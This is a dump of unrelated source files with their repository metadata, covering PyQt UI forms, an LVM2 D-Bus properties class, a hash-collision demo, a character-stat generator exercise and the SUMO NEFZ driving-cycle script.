        print
        for program in sorted(selected, key=lambda x: x['codename']):
            print '[%s]: %s' % (
                program['codename'],
                program['url'])
    else:
        # Plain mode: one codename per line.
        for program in sorted(selected, key=lambda x: x['codename']):
            print program['codename']
if __name__ == '__main__':
    main()
| 23.984615 | 69 | 0.556767 |
c02847c1d491cc1ce610e1dc490f15e02e0b2bde
| 2,984 |
py
|
Python
|
src/Sephrasto/UI/CharakterFreieFert.py
|
Ilaris-Tools/Sephrasto
|
8574a5b45da8ebfa5f69a775066fd3136da1c718
|
[
"MIT"
] | 1 |
2022-02-02T16:15:59.000Z
|
2022-02-02T16:15:59.000Z
|
src/Sephrasto/UI/CharakterFreieFert.py
|
Ilaris-Tools/Sephrasto
|
8574a5b45da8ebfa5f69a775066fd3136da1c718
|
[
"MIT"
] | 1 |
2022-01-14T11:04:19.000Z
|
2022-01-14T11:04:19.000Z
|
src/Sephrasto/UI/CharakterFreieFert.py
|
lukruh/Sephrasto
|
8574a5b45da8ebfa5f69a775066fd3136da1c718
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'CharakterFreieFert.ui'
#
# Created by: PyQt5 UI code generator 5.15.6
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Form(object):
    # Auto-generated by pyuic5 (see the file header): regenerate from the
    # .ui source instead of editing -- manual changes will be overwritten.
    def setupUi(self, Form):
        """Build the widget tree and layouts on *Form*."""
        Form.setObjectName("Form")
        Form.resize(872, 460)
        # Outer grid layout with a uniform 20px margin.
        self.gridLayout_3 = QtWidgets.QGridLayout(Form)
        self.gridLayout_3.setContentsMargins(20, 20, 20, 20)
        self.gridLayout_3.setObjectName("gridLayout_3")
        self.gridLayout = QtWidgets.QGridLayout()
        self.gridLayout.setVerticalSpacing(20)
        self.gridLayout.setObjectName("gridLayout")
        # Expanding spacers in rows 0 and 5 keep the content vertically centred.
        spacerItem = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
        self.gridLayout.addItem(spacerItem, 0, 0, 1, 1)
        self.label = QtWidgets.QLabel(Form)
        self.label.setMinimumSize(QtCore.QSize(0, 18))
        self.label.setAlignment(QtCore.Qt.AlignCenter)
        self.label.setObjectName("label")
        self.gridLayout.addWidget(self.label, 4, 0, 1, 1)
        spacerItem1 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
        self.gridLayout.addItem(spacerItem1, 5, 0, 1, 1)
        # Borderless group box hosting freieFertsGrid, which other code
        # presumably fills dynamically (empty here) -- see callers.
        self.groupBox = QtWidgets.QGroupBox(Form)
        self.groupBox.setTitle("")
        self.groupBox.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter)
        self.groupBox.setFlat(False)
        self.groupBox.setObjectName("groupBox")
        self.freieFertsGrid = QtWidgets.QGridLayout(self.groupBox)
        self.freieFertsGrid.setContentsMargins(20, 20, 20, 20)
        self.freieFertsGrid.setObjectName("freieFertsGrid")
        self.gridLayout.addWidget(self.groupBox, 2, 0, 1, 1)
        self.labelRegeln = QtWidgets.QLabel(Form)
        self.labelRegeln.setAlignment(QtCore.Qt.AlignCenter)
        self.labelRegeln.setObjectName("labelRegeln")
        self.gridLayout.addWidget(self.labelRegeln, 3, 0, 1, 1)
        self.gridLayout_3.addLayout(self.gridLayout, 0, 0, 1, 1)
        self.retranslateUi(Form)
        QtCore.QMetaObject.connectSlotsByName(Form)
    def retranslateUi(self, Form):
        """Apply the (German) display strings to the widgets."""
        _translate = QtCore.QCoreApplication.translate
        Form.setWindowTitle(_translate("Form", "Form"))
        self.label.setText(_translate("Form", "Der erste Eintrag ist die Muttersprache des Charakters.\n"
"Jeder Charakter beherrscht seine Muttersprache meisterlich, ohne dafür zu bezahlen."))
        self.labelRegeln.setText(_translate("Form", "Freie Fertigkeiten sind in drei Stufen geteilt: Unerfahren (I), erfahren (II) und meisterlich (III)."))
if __name__ == "__main__":
    # Standalone preview of the generated form.
    import sys
    app = QtWidgets.QApplication(sys.argv)
    Form = QtWidgets.QWidget()
    ui = Ui_Form()
    ui.setupUi(Form)
    Form.show()
    sys.exit(app.exec_())
| 44.537313 | 156 | 0.702748 |
c036d64299ea73f594f3e7274d7746722758b468
| 329 |
py
|
Python
|
backend/fakebox/models/player.py
|
teodorvoicencu/FakeBox
|
f14ca83643894d9d0761294cfce511a52401de68
|
[
"MIT"
] | null | null | null |
backend/fakebox/models/player.py
|
teodorvoicencu/FakeBox
|
f14ca83643894d9d0761294cfce511a52401de68
|
[
"MIT"
] | null | null | null |
backend/fakebox/models/player.py
|
teodorvoicencu/FakeBox
|
f14ca83643894d9d0761294cfce511a52401de68
|
[
"MIT"
] | null | null | null |
class Player:
    """A participant in a game session, identified by id and nickname."""

    def __init__(self, player_id: int, nickname: str, websocket, is_vip: bool = False):
        # Identity plus the live connection used to talk to this player.
        self.player_id = player_id
        self.nickname = nickname
        self.websocket = websocket
        self.is_vip = is_vip

    def __repr__(self):
        # Deliberately terse: only id and nickname, matching the original.
        return f'Player({self.player_id}, {self.nickname})'
| 32.9 | 87 | 0.641337 |
97eb068e3b56a2721bae8b3d960ae96d868aea8a
| 924 |
py
|
Python
|
cs/lambda_cs/05_hash_tables_and_blockchain/Hash-Tables/notes/longest_linked_list_chain.py
|
tobias-fyi/vela
|
b0b3d3c6dc3fa397c8c7a492098a02cf75e0ff82
|
[
"MIT"
] | null | null | null |
cs/lambda_cs/05_hash_tables_and_blockchain/Hash-Tables/notes/longest_linked_list_chain.py
|
tobias-fyi/vela
|
b0b3d3c6dc3fa397c8c7a492098a02cf75e0ff82
|
[
"MIT"
] | 8 |
2020-03-24T17:47:23.000Z
|
2022-03-12T00:33:21.000Z
|
cs/lambda_cs/05_hash_tables_and_blockchain/Hash-Tables/notes/longest_linked_list_chain.py
|
tobias-fyi/vela
|
b0b3d3c6dc3fa397c8c7a492098a02cf75e0ff82
|
[
"MIT"
] | null | null | null |
def longest_linked_list_chain(keys, buckets, loops=10):
    """
    Rolls `keys` number of random keys into `buckets` buckets
    and counts the collisions.
    Run `loops` number of times.
    """
    # NOTE(review): relies on `random` being imported elsewhere in the file.
    for _ in range(loops):
        # Fresh occupancy counter per trial, one slot per bucket.
        key_counts = {bucket: 0 for bucket in range(buckets)}
        for _ in range(keys):
            random_key = str(random.random())
            key_counts[hash(random_key) % buckets] += 1
        # The longest chain is the most heavily occupied bucket.
        largest_n = 0
        for count in key_counts.values():
            if count > largest_n:
                largest_n = count
        print(
            f"Longest Linked List Chain for {keys} keys in {buckets} buckets (Load Factor: {keys/buckets:.2f}): {largest_n}"
        )
# Demo runs with growing load factors (0.25, 1, 2, 8).
longest_linked_list_chain(4, 16, 5)
longest_linked_list_chain(16, 16, 5)
longest_linked_list_chain(32, 16, 5)
longest_linked_list_chain(1024, 128, 5)
| 31.862069 | 124 | 0.611472 |
e188fa4d523ec6ccd55ce55e698060c3b7fa8330
| 6,409 |
py
|
Python
|
hihope_neptune-oh_hid/00_src/v0.1/third_party/LVM2/daemons/lvmdbusd/automatedproperties.py
|
dawmlight/vendor_oh_fun
|
bc9fb50920f06cd4c27399f60076f5793043c77d
|
[
"Apache-2.0"
] | 1 |
2022-02-15T08:51:55.000Z
|
2022-02-15T08:51:55.000Z
|
hihope_neptune-oh_hid/00_src/v0.3/third_party/LVM2/daemons/lvmdbusd/automatedproperties.py
|
dawmlight/vendor_oh_fun
|
bc9fb50920f06cd4c27399f60076f5793043c77d
|
[
"Apache-2.0"
] | null | null | null |
hihope_neptune-oh_hid/00_src/v0.3/third_party/LVM2/daemons/lvmdbusd/automatedproperties.py
|
dawmlight/vendor_oh_fun
|
bc9fb50920f06cd4c27399f60076f5793043c77d
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (C) 2015-2016 Red Hat, Inc. All rights reserved.
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions
# of the GNU General Public License v.2.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import dbus
import dbus.service
from . import cfg
from .utils import get_properties, add_properties, get_object_property_diff, \
log_debug
from .state import State
# noinspection PyPep8Naming,PyUnresolvedReferences
class AutomatedProperties(dbus.service.Object):
	"""
	This class implements the needed interfaces for:
	org.freedesktop.DBus.Properties
	Other classes inherit from it to get the same behavior
	"""
	def __init__(self, object_path, search_method=None):
		# Register this object on the shared bus (cfg.bus) at object_path.
		dbus.service.Object.__init__(self, cfg.bus, object_path)
		self._ap_interface = []  # interface names declared via set_interface()
		self._ap_o_path = object_path
		self._ap_search_method = search_method  # lookup callable used by refresh(); may be None
		self.state = None  # last known state object (replaced in refresh())
	def dbus_object_path(self):
		"""Return the D-Bus object path this instance is registered at."""
		return self._ap_o_path
	def emit_data(self):
		"""Return (object_path, {interface: {property: value}}) for all
		registered interfaces."""
		props = {}
		for i in self.interface():
			props[i] = AutomatedProperties._get_all_prop(self, i)
		return self._ap_o_path, props
	def set_interface(self, interface):
		"""
		With inheritance we can't easily tell what interfaces a class provides
		so we will have each class that implements an interface tell the
		base AutomatedProperties what it is they do provide. This is kind of
		clunky and perhaps we can figure out a better way to do this later.
		:param interface: An interface the object supports
		:return:
		"""
		if interface not in self._ap_interface:
			self._ap_interface.append(interface)
	# noinspection PyUnusedLocal
	def interface(self, all_interfaces=False):
		"""Return the registered interface names; with all_interfaces=True
		the standard Introspectable/Properties interfaces are appended."""
		if all_interfaces:
			cpy = list(self._ap_interface)
			cpy.extend(
				["org.freedesktop.DBus.Introspectable",
					"org.freedesktop.DBus.Properties"])
			return cpy
		return self._ap_interface
	@staticmethod
	def _get_prop(obj, interface_name, property_name):
		"""Worker-side helper backing Get(): read one property by name."""
		value = getattr(obj, property_name)
		# Note: If we get an exception in this handler we won't know about it,
		# only the side effect of no returned value!
		log_debug('Get (%s), type (%s), value(%s)' %
			(property_name, str(type(value)), str(value)))
		return value
	# Properties
	# noinspection PyUnusedLocal
	@dbus.service.method(dbus_interface=dbus.PROPERTIES_IFACE,
						in_signature='ss', out_signature='v',
						async_callbacks=('cb', 'cbe'))
	def Get(self, interface_name, property_name, cb, cbe):
		# Answered asynchronously: the lookup is queued onto the worker
		# queue; cb/cbe deliver the reply or the error back to D-Bus.
		# Note: If we get an exception in this handler we won't know about it,
		# only the side effect of no returned value!
		r = cfg.create_request_entry(
			-1, AutomatedProperties._get_prop,
			(self, interface_name, property_name),
			cb, cbe, False)
		cfg.worker_q.put(r)
	@staticmethod
	def _get_all_prop(obj, interface_name):
		"""Worker-side helper backing GetAll(): every property of one
		interface, or a DBusException if the interface is not provided."""
		if interface_name in obj.interface(True):
			# Using introspection, lets build this dynamically
			properties = get_properties(obj)
			if interface_name in properties:
				return properties[interface_name][1]
			return {}
		raise dbus.exceptions.DBusException(
			obj._ap_interface,
			'The object %s does not implement the %s interface'
			% (obj.__class__, interface_name))
	@dbus.service.method(dbus_interface=dbus.PROPERTIES_IFACE,
						in_signature='s', out_signature='a{sv}',
						async_callbacks=('cb', 'cbe'))
	def GetAll(self, interface_name, cb, cbe):
		# Same asynchronous worker-queue pattern as Get().
		r = cfg.create_request_entry(
			-1, AutomatedProperties._get_all_prop,
			(self, interface_name),
			cb, cbe, False)
		cfg.worker_q.put(r)
	@dbus.service.method(dbus_interface=dbus.PROPERTIES_IFACE,
						in_signature='ssv')
	def Set(self, interface_name, property_name, new_value):
		# Synchronous write followed by a change notification signal.
		setattr(self, property_name, new_value)
		self.PropertiesChanged(interface_name,
							{property_name: new_value}, [])
	# As dbus-python does not support introspection for properties we will
	# get the autogenerated xml and then add our wanted properties to it.
	@dbus.service.method(dbus_interface=dbus.INTROSPECTABLE_IFACE,
						out_signature='s')
	def Introspect(self):
		r = dbus.service.Object.Introspect(self, self._ap_o_path, cfg.bus)
		# Look at the properties in the class
		props = get_properties(self)
		for int_f, v in props.items():
			r = add_properties(r, int_f, v[0])
		return r
	@dbus.service.signal(dbus_interface=dbus.PROPERTIES_IFACE,
						signature='sa{sv}as')
	def PropertiesChanged(self, interface_name, changed_properties,
							invalidated_properties):
		# dbus.service.signal: calling this emits the signal; the body
		# itself only logs the emission.
		log_debug(('SIGNAL: PropertiesChanged(%s, %s, %s, %s)' %
			(str(self._ap_o_path), str(interface_name),
			str(changed_properties), str(invalidated_properties))))
	def refresh(self, search_key=None, object_state=None):
		"""
		Take the values (properties) of an object and update them with what
		lvm currently has. You can either fetch the new ones or supply the
		new state to be updated with
		:param search_key: The value to use to search for
		:param object_state: Use this as the new object state
		:return: number of changed property sets signalled (None when the
			object has no search method)
		"""
		num_changed = 0
		# If we can't do a lookup, bail now, this happens if we blindly walk
		# through all dbus objects as some don't have a search method, like
		# 'Manager' object.
		if not self._ap_search_method:
			return
		# NOTE(review): self.lvm_id is expected to be provided by subclasses.
		search = self.lvm_id
		if search_key:
			search = search_key
		# Either we have the new object state or we need to go fetch it
		if object_state:
			new_state = object_state
		else:
			new_state = self._ap_search_method([search])[0]
			assert isinstance(new_state, State)
		assert new_state
		# When we refresh an object the object identifiers might have changed
		# because LVM allows the user to change them (name & uuid), thus if
		# they have changed we need to update the object manager so that
		# look-ups will happen correctly
		old_id = self.state.identifiers()
		new_id = new_state.identifiers()
		if old_id[0] != new_id[0] or old_id[1] != new_id[1]:
			cfg.om.lookup_update(self, new_id[0], new_id[1])
		# Grab the properties values, then replace the state of the object
		# and retrieve the new values.
		o_prop = get_properties(self)
		self.state = new_state
		n_prop = get_properties(self)
		changed = get_object_property_diff(o_prop, n_prop)
		if changed:
			for int_f, v in changed.items():
				self.PropertiesChanged(int_f, v, [])
				num_changed += 1
		return num_changed
55cdd1e45a11845aec8414b82e74156ad78c9607
| 2,654 |
py
|
Python
|
scripts/qt2/pyqt_sw23a_MouseEvent.py
|
ProfJust/Ruhr-TurtleBot-Competition-RTC-
|
5c2425bee331b4d5033757a9425676932d111775
|
[
"Unlicense",
"MIT"
] | null | null | null |
scripts/qt2/pyqt_sw23a_MouseEvent.py
|
ProfJust/Ruhr-TurtleBot-Competition-RTC-
|
5c2425bee331b4d5033757a9425676932d111775
|
[
"Unlicense",
"MIT"
] | null | null | null |
scripts/qt2/pyqt_sw23a_MouseEvent.py
|
ProfJust/Ruhr-TurtleBot-Competition-RTC-
|
5c2425bee331b4d5033757a9425676932d111775
|
[
"Unlicense",
"MIT"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
#pyqt_sw23_MouseEvent.py
import sys
from PyQt5.QtCore import (Qt, QTimer, QRect)
from PyQt5.QtWidgets import (QWidget, QPushButton, QApplication, QLabel)
from PyQt5.QtGui import QPainter, QColor, QFont
from PyQt5.QtGui import QPixmap, QKeyEvent
class Ui(QWidget):
    """PyQt5 demo widget: logs mouse moves/clicks, toggles fullscreen on
    double clicks, tracks arrow keys and paints a pixmap background."""
    # static class variables: last known mouse position
    mouse_pos_x = 0
    mouse_pos_y = 0
    def __init__(self):  # constructor
        # invoke the parent-class constructor
        super(Ui, self).__init__()
        self.initUI()
    def initUI(self):
        # configure the UI window
        self.setGeometry(30, 30, 600, 600)
        self.setWindowTitle('Qt - Mouse Event')
        # deliver mouse-move events even while no button is pressed
        self.setMouseTracking(True)
        self.show()
    def mouseMoveEvent(self, event):  # QWidget method (override)
        self.mouse_pos_x = event.x()
        self.mouse_pos_y = event.y()
        # print the mouse position
        print('x: %d y: %d' % (self.mouse_pos_x, self.mouse_pos_y))
    def mousePressEvent(self, event):  # QWidget method (override)
        if event.button()== Qt.LeftButton:
            print('Linksklick')
        if event.button()== Qt.RightButton:
            print("Rechtsklick")
    def mouseDoubleClickEvent(self, event):  # QWidget method (override)
        if event.button()== Qt.LeftButton:
            print('Linksklick doppelt, mit Rechtsklick doppelt wird es wieder klein')
            #self.showMaximized()  # with title bar
            self.showFullScreen()  # without title bar
        if event.button()== Qt.RightButton:
            print("Rechtsklick doppelt")
            self.showNormal()  # back to the original size
            #self.showMinimized()  # hide the window entirely
    def paintEvent(self, event):  # QWidget method (override)
        p = QPainter()
        p.begin(self)
        self.drawFunc(event, p)
        p.end()
    def keyPressEvent(self, event):  # QWidget method (override)
        # NOTE(review): keyLeft/keyRight are set lazily here but nothing in
        # this file reads them -- presumably hooks for a later exercise.
        if event.key() == Qt.Key_Left:
            self.keyLeft = True
        if event.key() == Qt.Key_Right:
            self.keyRight = True
    def keyReleaseEvent(self, event):  # QWidget method (override)
        if event.key() == Qt.Key_Left:
            self.keyLeft = False
        if event.key() == Qt.Key_Right:
            self.keyRight = False
        event.accept()
    def drawFunc(self, event, p):
        # paint the background from a pixmap (expects gras.jpg beside the script)
        pix = QPixmap("gras.jpg")
        p.drawPixmap(self.rect(),pix)
if __name__ == '__main__':
    # Standalone launch of the demo widget.
    app = QApplication(sys.argv)
    ui = Ui()
    sys.exit(app.exec_())
| 33.175 | 85 | 0.589676 |
e9e5ca591180e68e5942d7efb72a444d291477f7
| 77 |
py
|
Python
|
Online-Judges/CodingBat/Python/Warmup-01/03-sum_double.py
|
shihab4t/Competitive-Programming
|
e8eec7d4f7d86bfa1c00b7fbbedfd6a1518f19be
|
[
"Unlicense"
] | 3 |
2021-06-15T01:19:23.000Z
|
2022-03-16T18:23:53.000Z
|
Online-Judges/CodingBat/Python/Warmup-01/03-sum_double.py
|
shihab4t/Competitive-Programming
|
e8eec7d4f7d86bfa1c00b7fbbedfd6a1518f19be
|
[
"Unlicense"
] | null | null | null |
Online-Judges/CodingBat/Python/Warmup-01/03-sum_double.py
|
shihab4t/Competitive-Programming
|
e8eec7d4f7d86bfa1c00b7fbbedfd6a1518f19be
|
[
"Unlicense"
] | null | null | null |
def sum_double(a, b):
    """Return a + b, doubled when the two values are equal."""
    total = a + b
    return total * 2 if a == b else total
| 12.833333 | 21 | 0.519481 |
a15ced1edd95d5755d2aa895aec50099e9ad43f2
| 448 |
py
|
Python
|
src/onegov/org/models/recipient.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/org/models/recipient.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/org/models/recipient.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
from onegov.core.orm.mixins import content_property
from onegov.recipient import GenericRecipient, GenericRecipientCollection
class ResourceRecipient(GenericRecipient):
    """Recipient subtype for resource notifications, selected through the
    polymorphic identity 'resource' on the generic recipient table."""
    __mapper_args__ = {'polymorphic_identity': 'resource'}
    # content_property() comes from onegov.core.orm.mixins -- presumably
    # persisting these attributes in the record's content field; the value
    # schemas are defined by the callers (verify against usage).
    send_on = content_property()
    resources = content_property()
class ResourceRecipientCollection(GenericRecipientCollection):
    """Collection pinned to recipients of type 'resource'."""
    def __init__(self, session):
        # Narrow the generic collection to the 'resource' subtype.
        super().__init__(session, type='resource')
| 29.866667 | 73 | 0.787946 |
3d740609ff1f485574f2febbb5422c34d0cb75ed
| 3,146 |
py
|
Python
|
PMIa/2015/NIKISHIN_P_S/task_10_22.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
PMIa/2015/NIKISHIN_P_S/task_10_22.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
PMIa/2015/NIKISHIN_P_S/task_10_22.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
# Задача 10. Вариант 22.
# 1-50. Напишите программу "Генератор персонажей" для игры. Пользователю должно быть предоставлено 30 пунктов, которые можно распределить между четырьмя характеристиками: Сила, Здоровье, Мудрость и Ловкость. Надо сделать так, чтобы пользователь мог не только брать эти пункты из общего "пула", но и возвращать их туда из характеристик, которым он решил присвоить другие значения.
# Nikishin P. S.
# 27.05.2016
# Character generator: distribute a shared pool of points across four
# stats, with the option to give points back to the pool.
# NOTE(review): the task statement above says 30 points, but the original
# code used 40 -- kept at 40 to preserve behaviour; confirm the budget.
# Bug fixes vs. the original: adding points now ACCUMULATES onto a stat
# instead of overwriting it (the overwrite leaked points, since `score`
# was still decremented by the full amount), and removing points now
# SUBTRACTS from the stat instead of replacing it with the removed count.
# Stats are stored as ints (they were strings "0" mixed with ints), and
# the broken prompt escape "\Ведите ...n:" is repaired.
score = 40
hero = {"Сила": 0, "Здоровье": 0, "Мудрость": 0, "Ловкость": 0}
menu = None
while menu != 0:
    print("""
    0 - Выход
    1 - Добавить пункты к характеристикам
    2 - Уменьшить пункты характеристик
    3 - Просмотр характеристик""")
    menu = int(input("Выберите действие: "))
    if menu == 1:
        # Add points from the pool to one stat.
        print("Пожалуйста, введите характеристику для добавления пунктов. Для изменения доступны", len(hero), "характеристики:")
        for a in hero:
            print(a)
        harak = input("\nВедите характеристику: ").title()
        while harak not in hero:
            print("Такая характеристика отсутствует: ")
            harak = input("\nВедите характеристику: ").title()
        print("\nВведите количество пунктов,которое вы хотите назначить данной характеристике")
        print("Доступно", score, "пунктов")
        points = int(input("\nВведите количество пунктов:"))
        # Reject negative amounts and amounts exceeding the pool.
        while points > score or points < 0:
            print("Вы не можете назначить такое количество пунктов")
            print("Доступно", score, "пунктов")
            points = int(input("\nВведите количество пунктов:"))
        hero[harak] += points  # accumulate instead of overwrite
        print(points, "пунктов добавлено к", harak)
        score -= points
    elif menu == 2:
        # Return points from a stat back to the pool.
        print("Пожалуйста, введите имя характеристики для снятия пунктов." "Доступно изменение для: ")
        for a in hero:
            if hero[a] > 0:
                print(a)
        harak = input("\nВедите характеристику:").title()
        while harak not in hero:
            print("Нет такой характеристики, проверьте введенные данные: ")
            harak = input("\nВедите характеристику:").title()
        print("\nВведите количество пунктов для характеристики. Доступно", hero[harak], "пунктов:")
        points = int(input("\n:"))
        # Cannot remove more than the stat currently holds.
        while points > hero[harak] or points < 0:
            print("Невозможно удалить такое количество пунктов. Доступно", hero[harak], "пунктов")
            points = int(input("\nВведите количество пунктов:"))
        hero[harak] -= points  # subtract instead of replacing the value
        print(points, "пунктов удалено")
        score += points
    elif menu == 3:
        # Show the current stat sheet.
        print("\nХарактеристики героя")
        for a in hero:
            print(a, "\t\t", hero[a])
    elif menu == 0:
        print("Досвидания! Всего наилучшего!")
    else:
        print("В меню отсутствует запрашиваемый пункт")
3def1b29e37a332d4d958bd4bd88114812ae6bb1
| 119 |
py
|
Python
|
crawlab/tasks/celery.py
|
anhilo/crawlab
|
363f4bf7a4ccc192a99850998c1bd0fc363832a1
|
[
"BSD-3-Clause"
] | 1 |
2019-08-20T14:26:39.000Z
|
2019-08-20T14:26:39.000Z
|
crawlab/tasks/celery.py
|
anhilo/crawlab
|
363f4bf7a4ccc192a99850998c1bd0fc363832a1
|
[
"BSD-3-Clause"
] | 9 |
2019-05-24T03:53:09.000Z
|
2022-02-26T10:53:48.000Z
|
crawlab/tasks/celery.py
|
anhilo/crawlab
|
363f4bf7a4ccc192a99850998c1bd0fc363832a1
|
[
"BSD-3-Clause"
] | 1 |
2019-11-08T08:12:40.000Z
|
2019-11-08T08:12:40.000Z
|
from celery import Celery
# celery app instance
celery_app = Celery(__name__)
celery_app.config_from_object('config')
| 19.833333 | 39 | 0.815126 |
9adc7243f4d1b70f6873f955bafaa824462615fa
| 249 |
py
|
Python
|
Licence 2/I33/TP 4/ex_9.py
|
axelcoezard/licence
|
1ed409c4572dea080169171beb7e8571159ba071
|
[
"MIT"
] | 8 |
2020-11-26T20:45:12.000Z
|
2021-11-29T15:46:22.000Z
|
Licence 2/I33/TP 4/ex_9.py
|
axelcoezard/licence
|
1ed409c4572dea080169171beb7e8571159ba071
|
[
"MIT"
] | null | null | null |
Licence 2/I33/TP 4/ex_9.py
|
axelcoezard/licence
|
1ed409c4572dea080169171beb7e8571159ba071
|
[
"MIT"
] | 6 |
2020-10-23T15:29:24.000Z
|
2021-05-05T19:10:45.000Z
|
import random
def liste_perm(n):
L = []
for i in range(n):
L += [i]
i = 1
while i < n:
perm = random.randrange(0, n-i)
tmp = L[perm]
L[perm] = L[n-i]
L[n-i] = tmp
i += 1
return L
| 15.5625 | 39 | 0.413655 |
b11713ccbb2131e4e20add32f21fdefe3fa8d9a0
| 4,015 |
py
|
Python
|
Co-Simulation/Sumo/sumo-1.7.0/tools/emissions/nefz.py
|
uruzahe/carla
|
940c2ab23cce1eda1ef66de35f66b42d40865fb1
|
[
"MIT"
] | 4 |
2020-11-13T02:35:56.000Z
|
2021-03-29T20:15:54.000Z
|
Co-Simulation/Sumo/sumo-1.7.0/tools/emissions/nefz.py
|
uruzahe/carla
|
940c2ab23cce1eda1ef66de35f66b42d40865fb1
|
[
"MIT"
] | 9 |
2020-12-09T02:12:39.000Z
|
2021-02-18T00:15:28.000Z
|
Co-Simulation/Sumo/sumo-1.7.0/tools/emissions/nefz.py
|
uruzahe/carla
|
940c2ab23cce1eda1ef66de35f66b42d40865fb1
|
[
"MIT"
] | 1 |
2020-11-20T19:31:26.000Z
|
2020-11-20T19:31:26.000Z
|
#!/usr/bin/env python
# Eclipse SUMO, Simulation of Urban MObility; see https://eclipse.org/sumo
# Copyright (C) 2012-2020 German Aerospace Center (DLR) and others.
# This program and the accompanying materials are made available under the
# terms of the Eclipse Public License 2.0 which is available at
# https://www.eclipse.org/legal/epl-2.0/
# This Source Code may also be made available under the following Secondary
# Licenses when the conditions for such availability set forth in the Eclipse
# Public License 2.0 are satisfied: GNU General Public License, version 2
# or later which is available at
# https://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html
# SPDX-License-Identifier: EPL-2.0 OR GPL-2.0-or-later
# @file nefz.py
# @author [email protected]
# @date 2014-01-14
"""
Generates a ';'-separated file that contains the time line of the NEFZ
driving cycle.
"""
from __future__ import print_function
NEFZ1 = [
[11, 0, 0],
[4, 1.04, -1], [0, 0, 15],
[8, 0, 15],
[2, -0.69, -1], [0, 0, 10],
[3, -.93, -1], [0, 0, 0],
[21, 0, 0],
[5, 0.83, -1], [0, 0, 15],
[2, 0, -1],
[5, 0.94, -1], [0, 0, 32],
[24, 0, 32],
[8, -.76, -1], [0, 0, 10],
[3, -.93, -1], [0, 0, 0],
[21, 0, 0],
[5, .83, -1], [0, 0, 15],
[2, 0, -1],
[9, .62, -1], [0, 0, 35],
[2, 0, -1],
[8, .52, -1], [0, 0, 50],
[12, 0, 50],
[8, -.52, -1], [0, 0, 35],
[13, 0, 35],
[2, 0, -1],
[7, -.87, -1], [0, 0, 10],
[3, -.93, -1], [0, 0, 0],
[7, 0, 0],
]
NEFZ2 = [
[20, 0, 0],
[5, .83, -1], [0, 0, 15],
[2, 0, -1],
[9, .62, -1], [0, 0, 35],
[2, 0, -1],
[8, .52, -1], [0, 0, 50],
[2, 0, -1],
[13, .43, -1], [0, 0, 70],
[50, 0, 70],
[8, -.69, -1], [0, 0, 50],
[69, 0, 50],
[13, .43, -1], [0, 0, 70],
[50, 0, 70],
[35, .24, -1], [0, 0, 100],
[30, 0, 100],
[20, .28, -1], [0, 0, 120],
[10, 0, 120],
[16, -.69, -1], [0, 0, 80],
[8, -1.04, -1], [0, 0, 50],
[10, -1.39, -1], [0, 0, 0],
[20, 0, 0]
]
def build(what):
t = 0
v = 0
a = 0
ts1 = []
vs1 = []
as1 = []
ts2 = []
vs2 = []
as2 = []
ts3 = []
vs3 = []
as3 = []
ct = 0
cv = 0
lv = 0
lt = 0
ts1.append(0)
as1.append(0)
vs1.append(0)
for tav in what:
[t, a, v] = tav[:3]
v = v / 3.6
if v >= 0:
# destination velocity
if a != 0:
print("ups %s" % tav)
ts1.append(ct + t)
as1.append(0)
vs1.append(v)
# via acceleration
for it in range(0, t):
ts2.append(ct + it)
as2.append(a)
mv = cv + a * float(it)
if mv < 0:
mv = 0
vs2.append(mv)
# via speed (if not None, otherwise "keep in mind")
if v >= 0:
dt = float((ct + t) - lt)
if dt != 0:
dv = float(v - lv)
a = dv / float(dt)
for it in range(lt, ct + t):
ts3.append(it)
as3.append(a)
vs3.append(lv + a * float(it - lt))
ct = ct + t
if v >= 0:
cv = v
lv = v
lt = ct
return [ts1, vs1, as1, ts2, vs2, as2, ts3, vs3, as3]
BASE = 3
ts = []
vs = []
ts1 = []
vs1 = []
ts2 = []
vs2 = []
ts3 = []
vs3 = []
t = 0
for c in [NEFZ1, NEFZ1, NEFZ1, NEFZ1, NEFZ2]:
tmp = build(c)
for i in range(0, len(tmp[BASE])):
ts.append(tmp[BASE][i] + t)
vs.append(tmp[BASE + 1][i])
# ts1.append(tmp[0][i]+t)
# vs1.append(tmp[0+1][i])
# ts2.append(tmp[3][i]+t)
# vs2.append(tmp[3+1][i])
# ts3.append(tmp[6][i]+t)
# vs3.append(tmp[6+1][i])
t = t + tmp[BASE][-1] + 1
fdo = open("nefz.csv", "w")
pv = 0
for i in range(0, len(ts)):
fdo.write("%s;%s;%s\n" % (ts[i], vs[i] * 3.6, pv - vs[i]))
pv = vs[i]
fdo.close()
| 24.041916 | 77 | 0.440349 |
49516b57d0d0f33dd71e42650cd7a6279ade8bcf
| 1,629 |
py
|
Python
|
books/PythonAutomate/gui_automate/pyautogui_sample.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
